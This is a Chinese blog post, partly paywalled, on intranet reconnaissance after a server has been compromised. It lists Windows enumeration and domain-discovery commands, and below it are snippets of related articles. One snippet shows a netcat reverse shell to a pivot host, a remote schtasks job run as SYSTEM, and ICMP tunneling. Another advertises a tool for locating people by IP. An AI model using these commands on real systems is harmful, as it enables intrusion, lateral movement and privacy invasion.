基础内网信息探针思路

最新推荐文章于 2023-10-26 21:59:13 发布
原创 最新推荐文章于 2023-10-26 21:59:13 发布 · 631 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #服务器 #linux #web安全

基本信息收集

systeminfo:

win系统,用来查看系统配置信息。

net start:

win系统,用来查看系统可启动的服务。

tasklist:

查看进程列表。

schtasks:

查看计划任务。

网络信息收集

ipconfig /all:

判断存在域-dns

域环境中通常会存在一个dns服务器,由dns服务器去进行解析域名

net view /domain:

判断存在域的命令

net time /domain :

判断主域的命令。

最低0.47元/天 解锁文章
红队内网攻防渗透:内网渗透之内网对抗:信息收集篇&SPN扫描&DC定位&角色区域定性&服务探针&安全防护&凭据获取
HACKONE的博客
06-22 673
例如FTP服务器、E-Mail服务器及网站服务器等允许外部用户访问这些服务器,但不可能接触到存放在内网中的信息,就算黑客入侵DMZ 中服务器,也不会影响到公司内部网络安全,不允许任何外部网络的直接访问,实现内外网分离,在企业的信息安全防护加了一道屏障。扩大范围,利用域管理员可以登陆域中任何成员主机特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。IP、网关、DNS、出网判断、本机网络连接以及开放端口、本机的代理,域名是什么等。
红队打点的思路信息收集
最新发布
ubaichu的博客
09-14 2713
红队学习笔记,打点的思路以及信息收集
内网安全】域环境&工作组&局域网探针方案
一期一会的博客
02-18 3558
0x00 概念 1.1 工作组 在局域网里,范围小的计算机 可操作ARP欺骗,DNS劫持等等。 1.2 DMZ 两个防火墙之间的空间 1.3 域环境 存在一台主机管理计算机。大部门都是windows,也有linuxLINUX下需要安装LDAP环境,功能上没有windows域强大,用linux管理技术人员门槛比较高。 1.4 域控制器DC 域里的管理者,域的最高权限。 1.5 活动目录AD 网络基本概况 0x01 信息收集 2.1 基本信息收集 systeminfo 详细信息 net start
内网安全-域环境&工作组&局域网探针方案
xhscxj的博客
03-08 719
案例 1-基本信息收集操作演示 当我们拿到web服务器的权限时,可通过下面命令进行信息收集 了解当前服务器的计算机基本信息,为后续判断服务器角色,网络环境等做准备 systeminfo 详细信息 net start 启动服务 tasklist 进程列表 schtasks 计划任务 案例 2-网络信息收集操作演示 ipconfig /all 判断存在域-dns net view /domain 判断存在域 net time /domain 判断主域 netstat -ano 当前网络端口开放 nslo...
内网安全 - 局域网探针
acepanhuan的博客
03-09 4326
内网安全 - 局域网探针
内网渗透-前期信息收集
weixin_60329395的博客
07-29 836
当我们渗透web端或者通过其他方式拿到某内网主机shell,我们就可以尝试开始内网渗透,也叫做后渗透,域渗透等,探索域内网络架构,通过内网渗透得到其他内网主机的权限,或者通过内网主机获取到同域的最高管理员主机权限等............
信息探针
k0sec的安全路
03-23 1373
1.操作系统探针 操作系统: 1)Windows 大小写不敏感 例子:www.k0sec.com/index.php =>www.k0sec.com/index.phP 访问正常 2)linux 大小写敏感 例子:www.k0sec.com/index.php =>www.k0sec.com/index.phP 访问不正常 2.数据库类型探针 access mysql mssql ...
最好用的局域网ip扫描工具
05-01
是我用过的最好的局域网ip扫描工具,不仅是ip扫描搜索,所需信息基本都能够扫描出来,不可多得的好工具。
65、内网安全-域环境&工作组&局域网探针方案
山兔的博客
10-26 982
所以我们获得一台电脑上面的一些比较重要信息的时候,就可能是那个密码,也可能是这个人自己的密码,比如说他是老板,他自己设计密码,和他网上通讯的密码是有关系的,比如他的QQ密码,浏览器访问网站的密码,个人电脑在这个内网里面,办公电脑,有人就肯定有它的个人信息在上面,那就收录这台电脑储存的信息,包括浏览器的信息,有没有在这上面连接其它电脑的信息,这些信息就比较关键,因为在连接的时候,有些各种应用,服务软件,他都会有类似的保存机制,问你是否保存密码,是否储存,就说明这个密码有可能帮他翻出。
信息探针基础知识
wo41ge的博客
01-19 1380
一.网站四大套件信息探针: 1.操作系统:Linux Windows Windows 不敏感 大小写 Linux 敏感 2.数据库:access mysql oracle postsql db2 sybase 端口服务对应 搭建组合推算 3.搭建平台:lis,apache 搭建平台:审查元素(网络),第三方元素查询,搜索引擎(谷歌hack语法) 4.脚本类型:...
Ip探针_信息探针_社工查询个人信息php网站源码
热门推荐
源码下载
03-11 1万+
介绍: Ip探针_信息探针_社工查询个人信息php网站源码 他可以查IP 精确位置 然后社工地址的话更准 需要的东西: 服务器或主机一部 2.浏览器搜索 二级域名分发 很多免费的 3.绑定域名 4.上传源码 5.源码里配置一下数据库 6.导入sql 后台登录方法 域名加/admin 例如域名是hk.com 那么后台登录方法 hk.com/admin 之后搭建完成 网盘下载地址: https://zijiewangpan.com/3pnonYKNIyP 图片: ...
域环境&工作组&局域网探针方案
mingyqf的博客
11-07 957
演示案例:  基本信息收集操作演示  网络信息收集操作演示  用户信息收集操作演示  凭据信息收集操作演示  探针主机域控架构服务操作演示 #案例 1-基本信息收集操作演示 旨在了解当前服务器的计算机基本信息,为后续判断服务器角色,网络环境等做准备 systeminfo 详细信息 net start 启动服务 tasklist 进程列表 schtasks 计划任务 #案例 2-网络信息收集操作演示 旨在了解当前服务器网络接口信息,为判断当前角色,功能,网络架构做准备 ipconfi...
内网信息收集
m0_58606546的博客
11-17 1158
一:工作组信息收集 1.1:本机信息收集 系统 systeminfo #查看系统信息 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #查看系统及版本,英文系统 systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" #查看系统及版本,中文系统 echo %PROCESSOR_ARCHITEC...
网络攻防之内网安全横向渗透权限提升
weixin_46626737的博客
06-30 985
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
内网渗透(windows)
qq_63980959的博客
04-05 3706
Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。
Windows操作系统获取账号信息
y_m_h的博客
02-17 2579
1.在cmd中使用“net user”查询到Windows操作系统所有用户的用户名。 2.在cmd中使用“wmic useraccount get name”查询到Windows操作系统所有用户的用户名。 3.在cmd中使用“wmic useraccount list full”查询到Windows操作系统所有用户的用户信息。 ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值